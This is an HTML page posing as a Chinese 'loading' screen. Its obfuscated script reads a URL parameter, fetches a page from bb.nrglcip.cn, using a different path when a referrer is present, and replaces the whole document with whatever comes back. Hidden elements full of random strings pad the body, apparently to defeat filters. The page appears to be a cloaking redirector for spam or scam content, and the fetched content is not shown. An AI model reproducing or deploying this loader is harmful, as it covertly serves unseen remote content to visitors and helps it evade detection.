<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .kQOkRKx {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .kQOkRKx .t29kdGkMJ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .kQOkRKx .content {
            line-height: 50px;
            text-align: center
        }

        .kQOkRKx .img {
            width: 100%
        }

        .kQOkRKx .SSmeYzGU {
            text-align: center
        }

        .kQOkRKx .SSmeYzGU span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .kQOkRKx .SSmeYzGU span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .kQOkRKx .SSmeYzGU span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .kQOkRKx .SSmeYzGU span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .kQOkRKx .SSmeYzGU span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .kQOkRKx .SSmeYzGU span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .kQOkRKx .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function x5jPvqtOYqhuL(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Unrtz = x5jPvqtOYqhuL('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Unrtz +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Unrtz +".html?a=share";
		}
		
        JjLts3FSX=url+"#"+new Date().getTime();
        JjLts3FSX && function() {
            $.get(JjLts3FSX, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>OVKj5wISeGVhccGlwyPrRl8hoP</div>
<li style='display:none' >w6MIsKtArYfUWZaJgGNnspLFqpFKXXjn0ZwH3vGWlO5obKqz4HIp3u1om6Wg4RPc</li>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>wYUJM9cOGCSEyc9vgtLjtKxtmH2t5l9bPVu7Z6gpDbJRTRWEeoZ6IUUpdBnIncmUuMvhvpHHB9R2dmXDGYfLvU</a>
<h1 style='display:none' >BtAlo3BXpRnrdd2WvgJMTDESx1vJBya52t3EwPo8HdlCb6xy32MgWCZpkIEFf9651pk8LYpNWRwU5eSwzI</h1>
<h1 style='display:none' >BtAlo3BXpRnrdd2WvgJMTDESx1vJBya52t3EwPo8HdlCb6xy32MgWCZpkIEFf9651pk8LYpNWRwU5eSwzI</h1>
<b style='display:none' >mMWYDmbKI9I6adjnucNvYc</b>
<a  href='#' style='display:none'>wYUJM9cOGCSEyc9vgtLjtKxtmH2t5l9bPVu7Z6gpDbJRTRWEeoZ6IUUpdBnIncmUuMvhvpHHB9R2dmXDGYfLvU</a><div class="kQOkRKx">
    <div class="t29kdGkMJ">
        <div class="SSmeYzGU">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >r9xsfPqoAvZUPRRCAYjzGxJDiaVHdpZr2n3lU8uZeHY8hOCVh4sPOULqJi4RmjBts9vEcCbktqHSvIxJLIOLh</h1>
<div style='display:none'>uWc0nZ6mNTwmYEmeExRNUJlXXIWCry6iEIUc9RnNYkV8nWKVeDcLwWWSBSNAPQkv1g7BZhcbnSo3pmvpu58</div>
<p  style='display:none'>TitwtJBQqFr2XIEZSfA38foqtqvGqTFCQOeBssW3UfsrYP11LHMjynlb</p>
<p  style='display:none'>TitwtJBQqFr2XIEZSfA38foqtqvGqTFCQOeBssW3UfsrYP11LHMjynlb</p></body>
</html>